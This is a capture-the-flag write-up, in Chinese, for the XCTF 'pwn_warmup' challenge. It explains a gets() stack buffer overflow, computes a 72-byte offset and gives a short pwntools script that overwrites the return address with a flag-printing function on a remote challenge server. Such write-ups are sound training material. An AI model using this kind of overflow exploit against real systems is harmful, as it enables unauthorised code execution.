攻防世界——pwn_warmup
- checksec:没有开启任何保护
- 看到了熟悉的gets()函数,通常一看到这个函数就八成有缓冲区溢出漏洞,可以看出程序为v5开辟了40H的存储空间,所以输入长度超过40H即可造成溢出,再看sprint()函数
- 可以看到这个函数是获取flag的关键点,程序会打印出此函数的位置,即0x40060d,到这里思路就差不多明了了,我们需要控制溢出位置,把返回地址改为此函数的地址,我们当前函数的返回值位于RBP+8的位置,因此溢出点可以通过计算得出:40H+8H=48H=72
- exp如下
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(arch = 'amd64', os = 'linux')
sh = remote('111.198.29.45',51974)
target = 0x40060d
sh.sendline('A' * 72 + p64(target))
sh.interactive()
攻防世界——pwn_warmup相关推荐
- 【攻防世界001】Guess-the-Number
攻防世界之前刷了几十题了,没写wp,感觉很简单没啥意思.后来参加了几次比赛,发现有点干不动,决定还是老老实实刷题好了.这是第一篇wp,这题很简单,是个jar,用jd-gui可以得到java源码. 原来 ...
- 攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制
ctf(pwn) canary保护机制讲解 与 破解方法介绍 程序执行流程 有三个选项,1是利用栈溢出,2是利用格式化字符串,3是退出;可连续输入多次; IDA分析 解题思路 程序存在canary保护 ...
- 攻防世界(Pwn) forgot---栈溢出;(方法二)
攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...
- 攻防世界(Pwn) forgot---栈溢出;(方法一)
攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...
- 攻防世界misc新手_[攻防世界]mobile新手练习区easy-apk
[攻防世界]mobile新手练习区easy-apk easy-apk最佳Writeup由129师386旅独立团 • devi1提供 难度系数: 7.0 题目来源: 暂无 题目描述:无 题目场景: 暂无 ...
- 攻防世界 ——crypto
目录 新手区部分题解: 1,easy_RSA 2,Normal_RSA 3, 幂数加密 4,easy_ECC 高手进阶区部分题题解 5, ENC 6,告诉你个秘密 7,Easy-one 8,说我作弊需 ...
- 攻防世界———MISC 高手区题解
目录 1,base64stego 2,easycap 3,Avatar 4,What-is-this 5,签到题 6,Training-Stegano-1 7,Excaliflag 8,Get-the ...
- 攻防世界 web(二)
这周接着刷攻防世界的web题( ̄︶ ̄)↗ 1.command_execution 看提示这题为命令执行漏洞(command_execution),关于命令执行漏洞,我前面有篇博客详细介绍了,大家不了解 ...
- misc高阶 攻防世界_攻防世界 Misc 进阶题(一)
攻防世界 Misc 进阶题(一) 关于隐写术的思路或方法 转载: https://blog.csdn.net/a_small_rabbit/article/details/79644078 隐 ...
最新文章
- 多视图几何总结——摄像机模型
- 三、新手Jupyter不会用,我十招教你盘她
- CUDA编程中内存管理机制
- lin-cms-dotnetcore功能模块的设计
- java多维数组题目_Java题库——chapter7 多维数组
- CCRD_TOC_2008年第4期
- 清华学霸组团的工业 AIoT 创企再获数千万融资:玩家应推动在边缘 AI 芯片上跑算法...
- EPSnbsp;QOS体系图的解读
- windows常用操作
- List数据转Map数据并进行分组排序
- Java中将16进制字符串转换成汉字
- 【Java基本功】很多人经常忽视的Java基础知识点
- Using Flume要点
- 【上电即上华为云】华为云openCPU智联模组_wifi_HF-LPX70_RISC-V_CoAP
- Kinect外包团队(长年承接微软Kinect体感项目外包,有大型Kinect案例)
- 车靓靓·微水上门洗车项目介绍
- 2021年中国巴豆酸市场趋势报告、技术动态创新及2027年市场预测
- python 等腰三角形的性质,相似三角形性质判定().ppt
- ln火线零线_ln线哪个是火线零线
- 心电监护仪数据图解_心电监护仪原理和使用步骤详解
热门文章
- 常见滤波汇总(KF、EKF、UKF和PF)
- html图片定位坐标原点,利用CSS定位背景图片的常用方法总结
- LocalDateTime获取服务器当前时间----24小时与12小时
- 【MATLAB图像处理】傅里叶变换--幅度谱、相位谱、逆变换
- mysql 截断日期_数据截断:错误的日期时间值:“
- SDS很好,但处理器需“减负”!
- Java Refactor 代码重构
- RatingBar基本使用
- SWFObject参数,SWFObject使用方法
- Scrapy框架快速执行cmd命令:‘scrapy crawl qsbk_spider’